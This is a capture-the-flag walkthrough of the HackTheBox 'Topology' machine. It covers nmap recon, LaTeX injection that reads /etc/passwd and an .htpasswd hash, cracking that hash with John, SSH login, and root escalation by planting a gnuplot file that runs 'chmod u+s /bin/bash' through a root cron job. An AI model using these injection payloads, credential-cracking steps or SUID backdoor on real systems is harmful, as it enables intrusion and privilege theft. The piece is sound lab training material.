Topology

#Linux #Enumeration #

This is a easy difficulty Linux machine from HackTheBox created by gedsic. In this scenario, my IP is 10.10.14.71 and the target’s IP is 10.129.151.145

Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal

$ ping -c 1 10.129.151.145

PING 10.129.151.145 (10.129.151.145) 56(84) bytes of data.
64 bytes from 10.129.151.145: icmp_seq=1 ttl=62 time=174 ms

--- 10.129.151.145 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 174.093/174.093/174.093/0.000 ms

The machine is alive, and by the TTL (close to 64) we can assume and confirm that is definitely a Linux Machine

Local Terminal

nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.151.145 -oG AllPorts

Completed SYN Stealth Scan at 16:03, 26.39s elapsed (65535 total ports)
Nmap scan report for 10.129.151.145
Host is up, received reset ttl 62 (0.0029s latency).
Scanned at 2023-07-05 16:03:03 UTC for 26s
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 62
80/tcp  open  http    syn-ack ttl 62
443/tcp open  https   syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.63 seconds
           Raw packets sent: 131091 (5.768MB) | Rcvd: 5122 (204.880KB)

Local Terminal

nmap -sCV -p 22,80,443 10.129.151.145 -oN Target

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-05 16:04 UTC
Nmap scan report for 10.129.151.145
Host is up (0.022s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
|   256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
|_  256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
80/tcp  open  http    Apache/2.4.41 (Ubuntu)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Miskatonic University | Topology Group
| fingerprint-strings:
|   FourOhFourRequest, GetRequest, HTTPOptions:
|     HTTP/1.0 403 connecting to :80: connecting to <nil>:80: dial tcp :80: connectex: No connection could be made because the target machine actively refused it.
|     Connection: close
|     connecting to :80: connecting to <nil>:80: dial tcp :80: connectex: No connection could be made because the target machine actively refused it.
|   GenericLines:
|     HTTP/1.0 400 reading request: malformed HTTP request ""
|     Connection: close
|     reading request: malformed HTTP request ""
|   Help:
|     HTTP/1.0 400 reading request: malformed HTTP request "HELP"
|     Connection: close
|     reading request: malformed HTTP request "HELP"
|   RTSPRequest:
|     HTTP/1.0 400 reading request: malformed HTTP version "RTSP/1.0"
|     Connection: close
|_    reading request: malformed HTTP version "RTSP/1.0"
443/tcp open  https?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
<...>

By searching "OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 launchpad" you can conclude that is a Ubuntu-Focal machine, this is good to know in some targets just in case that there is an specific Linux exploit.

Local Terminal

whatweb http://10.129.151.145
http://10.129.151.145 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], 
Email[lklein@topology.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], 
IP[10.129.151.145], Title[Miskatonic University | Topology Group]

There is an email, save that information. { lklein@topology.htb }

• Browser: http://10.129.151.145/

By hovering, there is just one interesting link at "LaTeX Equation Generator"

Not found, the new domain to /etc/hosts as "10.129.151.145 latex.topology.htb topology.htb" before going again.

• Browser: http://latex.topology.htb/equation.php

Looks like a perfect place for LaTeX injection

But first, check if you can explore more from latex.topology.htb

We can explore the whole site, but there is nothing interesting.

Exploit

Search for "LaTeX Injection Exploit" and return to http://latex.topology.htb/equation.php

PayloadsAllTheThings/LaTeX Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Formula/CSV/Doc/LaTeX InjectionHackTricks

Inject the basic payload

But it does not work

Maybe it has some validation... let's search for different way to execute commands.

• \include{password} Fail

• \lstinputlisting{/etc/passwd} Fail

• $\include{password}$ Fail

• $\lstinputlisting{/etc/passwd}$

It works, now we need a way to execute commands

Reverse Shell [vdaisley]

All right, we can read files, but we can't execute commands, at this point the best option is to search for information about the target and see if you can read some files that store passwords.

For "Apache/2.4.41" it's htpasswd located at /var/www/html/, try $\lstinputlisting{/var/www/html/.htpasswd}$ it fails... what about dev? try: $\lstinputlisting{/var/www/dev/.htpasswd}$

It works! {vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0}

Let's use John to crack the password

Local Terminal

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
calculus20       (?)
1g 0:00:00:05 DONE (2023-07-05 19:34) 0.1941g/s 193342p/s 193342c/s 193342C/s calebd1..caitlyn09
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now with the password, we can try login through ssh {vdaisley : calculus20}

Local Terminal

ssh vdaisley@10.129.151.145

Target Terminal [vdaisley]

cat user.txt

Privilege Escalation [vdaisley > root]

We are inside the machine, now we want to change to root.

Scouting process:

Target Terminal [vdaisley]

vdaisley@topology:/$ id
uid=1007(vdaisley) gid=1007(vdaisley) groups=1007(vdaisley)

vdaisley@topology:/$ sudo -l
[sudo] password for vdaisley:
Sorry, user vdaisley may not run sudo on topology.

vdaisley@topology:/$ find \-perm -4000 2>/dev/null
./usr/sbin/pppd
./usr/lib/openssh/ssh-keysign
./usr/lib/policykit-1/polkit-agent-helper-1
./usr/lib/eject/dmcrypt-get-device
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/bin/sudo
./usr/bin/fusermount
./usr/bin/umount
./usr/bin/su
./usr/bin/chsh
./usr/bin/newgrp
./usr/bin/at
./usr/bin/gpasswd
./usr/bin/mount
./usr/bin/passwd
./usr/bin/chfn

vdaisley@topology:/$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep

Nothing suspicious, an alternative here is to search using pspy.

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

Local Terminal

python3 -m http.server 8080

Target Terminal [vdaisley]

cd /tmp
wget http://10.10.14.71:8080/pspy64
chmod +x pspy64

Open an http.server and then download pspy from the target. Then execute the file.

Target Terminal [vdaisley]

./pspy64

<...>
2023/07/05 16:33:25 CMD: UID=0     PID=1      | /sbin/init
2023/07/05 16:34:01 CMD: UID=0     PID=7685   | /usr/sbin/CRON -f
2023/07/05 16:34:01 CMD: UID=0     PID=7684   | /usr/sbin/CRON -f
2023/07/05 16:34:01 CMD: UID=0     PID=7686   | /bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} \;
2023/07/05 16:34:01 CMD: UID=0     PID=7687   | find /opt/gnuplot -name *.plt -exec gnuplot {} ;
2023/07/05 16:34:01 CMD: UID=0     PID=7688   |
2023/07/05 16:34:01 CMD: UID=0     PID=7689   |
2023/07/05 16:34:01 CMD: UID=0     PID=7690   | /bin/sh -c /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7691   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7694   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7693   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7692   | grep enp
2023/07/05 16:34:01 CMD: UID=0     PID=7697   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7696   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7695   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7698   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7699   | /bin/sh /opt/gnuplot/getdata.sh
2023/07/05 16:34:01 CMD: UID=0     PID=7700   | /bin/sh /opt/gnuplot/getdata.sh
<...>

That fragment looks pretty interesting... let's check what's inside.

Target Terminal [vdaisley]

vdaisley@topology:/tmp$ cd /opt/gnuplot

vdaisley@topology:/opt/gnuplot$ ls
ls: cannot open directory '.': Permission denied

We can't see anything inside, but from pspy we know that is executing something, search for exploits.

Gnuplot Privilege Escalation | Exploit Noteshideckies

Target Terminal [vdaisley]

vdaisley@topology:/tmp$ nano exploit.plt

system "chmod u+s /bin/bash"

After creating our payload, we are going to move it to /opt/gnuplot, why? because of the following line from pspy64.

• /bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} \;

Target Terminal [marcus]

cp exploit.plt /opt/gnuplot/exploit.plt

And now we wait...

Target Terminal [root]

vdaisley@topology:/tmp$ bash -p

bash-5.0# cat /root/root.txt
7e8f8c4ea86750ebbf6619bfe1bffc4d